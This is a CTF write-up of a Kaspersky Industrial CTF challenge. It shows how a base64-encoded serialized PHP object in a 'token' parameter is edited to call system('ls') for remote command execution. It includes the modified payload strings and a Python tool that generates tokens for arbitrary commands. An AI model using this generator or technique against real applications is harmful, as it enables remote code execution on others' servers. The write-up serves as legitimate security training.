CTF writeup: PHP object injection in Kaspersky CTF

This is the walkthrough for the PHP object injection challenge from the Kaspersky Industrial CTF organized by Kaspersky Lab.

In this challenge there was a form that performs an arithmetic operation on user-supplied input.

Let's go through the normal use case first. I entered 2 and 3 in the first and second text boxes respectively.

As we can see, we got the result of our expression: 2 + 3 = 5.

Plain and simple, but one thing that got my attention was the "Token". Let's try clicking the "Share it" button.

This issued a GET request carrying a "token" parameter. Let's look at the response.

It shows the same expression we previously calculated: 2 + 3 = 5.

After base64-decoding the token I got a serialized PHP object.

As we can see, the operation is "sum" and the arguments (an array) are 2 and 3. There is a lot of material on PHP object injection on the web; I went through most of it, and it is worth a look.

I then did a lot of trial and error, which I am not posting here for the sake of this article's length.

Let's have a look at our serialized object:

O:10:"Expression":3:{s:14:"Expressionop";s:3:"sum";s:18:"Expressionparams";a:2:{i:0;d:2;i:1;d:3;}s:9:"stringify";s:5:"2 + 3";}

Note that the declared lengths 14 and 18 are larger than the visible names "Expressionop" (12 characters) and "Expressionparams" (16 characters). That is because op and params are private properties of the Expression class: PHP serializes a private property name as "\0ClassName\0name", and the two NUL bytes count toward the length but are not visible in a browser. If you edit the token by hand, those NUL bytes must be preserved, otherwise unserialize() rejects the string.

You can play with this serialized object and see how it behaves.

I suspected that "sum" is the name of a function the application calls and that the params property is an array whose first value is 2 and second value is 3.

Any PHP function name can be put in place of sum: the application appears to call whatever function the op property names, with params as the argument.

I changed sum to system(), the PHP function that executes a shell command and outputs the result.

O:10:"Expression":3:{s:14:"Expressionop";s:6:"system";s:18:"Expressionparams";a:2:{i:0;d:2;i:1;d:3;}s:9:"stringify";s:5:"2 + 3";}

Keep in mind that the declared string length must be updated from 3 to 6, because the new function name (system) is 6 characters long; unserialize() fails on a string whose declared length does not match its content.

s:3:"sum"

s:6:"system"

Then base64-encode it again.

Let's send the request with the new payload.

Cool! We were right: we can pass any PHP function in this serialized object. The only thing that remains is to give the parameters in the right format. sum took an array as its argument, whereas system() needs a string.

I replaced a:2:{i:0;d:2;i:1;d:3;} (array)

with

s:2:"ls" (string)
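Editing lengths by hand is error-prone, especially with the invisible NUL bytes in the private property names. As an added example (not code from the original writeup), here is a small Python serializer that emits PHP's serialize() format and builds both tokens from this page: the original sum object and the system/"ls" payload. It assumes the object layout shown above (class Expression with private op and params and a public stringify); the float formatting is a simplification of PHP's and only covers the plain values seen here.

```python
import base64


class PhpObject:
    """A PHP object to serialize: class name plus ordered (name, visibility, value) properties."""

    def __init__(self, cls, props):
        self.cls = cls
        self.props = props  # list of (name, "public" | "protected" | "private", value)


def mangle_prop_name(cls, name, visibility):
    # PHP serialize() mangles non-public property names with NUL bytes.
    # These bytes count toward the s:N length but are invisible in a browser,
    # which is why "Expressionop" on this page is declared as s:14, not s:12.
    if visibility == "private":
        return f"\0{cls}\0{name}"
    if visibility == "protected":
        return f"\0*\0{name}"
    return name


def php_serialize(value):
    """Serialize a Python value the way PHP's serialize() would (subset used here)."""
    if isinstance(value, bool):          # bool before int: True is an int in Python
        return f"b:{int(value)};"
    if isinstance(value, int):
        return f"i:{value};"
    if isinstance(value, float):
        return f"d:{value:g};"           # simplification: 2.0 -> d:2; like PHP 7.1+
    if isinstance(value, str):
        # PHP declares the byte length, then the raw bytes (no escaping)
        return f's:{len(value.encode("utf-8"))}:"{value}";'
    if isinstance(value, (list, tuple)):
        body = "".join(php_serialize(i) + php_serialize(v) for i, v in enumerate(value))
        return f"a:{len(value)}:{{{body}}}"
    if isinstance(value, dict):
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return f"a:{len(value)}:{{{body}}}"
    if isinstance(value, PhpObject):
        body = "".join(
            php_serialize(mangle_prop_name(value.cls, n, vis)) + php_serialize(v)
            for n, vis, v in value.props
        )
        return f'O:{len(value.cls.encode("utf-8"))}:"{value.cls}":{len(value.props)}:{{{body}}}'
    raise TypeError(f"unsupported type {type(value).__name__}")


def expression_token(op, params, stringify):
    """Build the base64 'token' for the Expression object layout seen in the challenge (assumed)."""
    obj = PhpObject("Expression", [
        ("op", "private", op),
        ("params", "private", params),
        ("stringify", "public", stringify),
    ])
    return base64.b64encode(php_serialize(obj).encode("utf-8")).decode("ascii")


def decode_token(token):
    """Inverse of expression_token: base64-decode back to the serialized string."""
    return base64.b64decode(token).decode("utf-8")


if __name__ == "__main__":
    # The benign object from the page: sum over [2, 3]
    print(repr(decode_token(expression_token("sum", [2.0, 3.0], "2 + 3"))))
    # The command-execution payload: system("ls"), with lengths computed for us
    print(expression_token("system", "ls", "2 + 3"))
```

Because the lengths and NUL bytes are computed rather than typed, changing the command is just a matter of changing the second argument; the output token can be pasted straight into the token parameter.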

Let's try to run the ls command.

Bingo!

The last task ahead of us is to find the flag, which was not too difficult.

Let's open the fl4g_h4r3 file.

And finally we got the flag. Thanks for reading.

#SharingIsCaring

Let's connect on Twitter.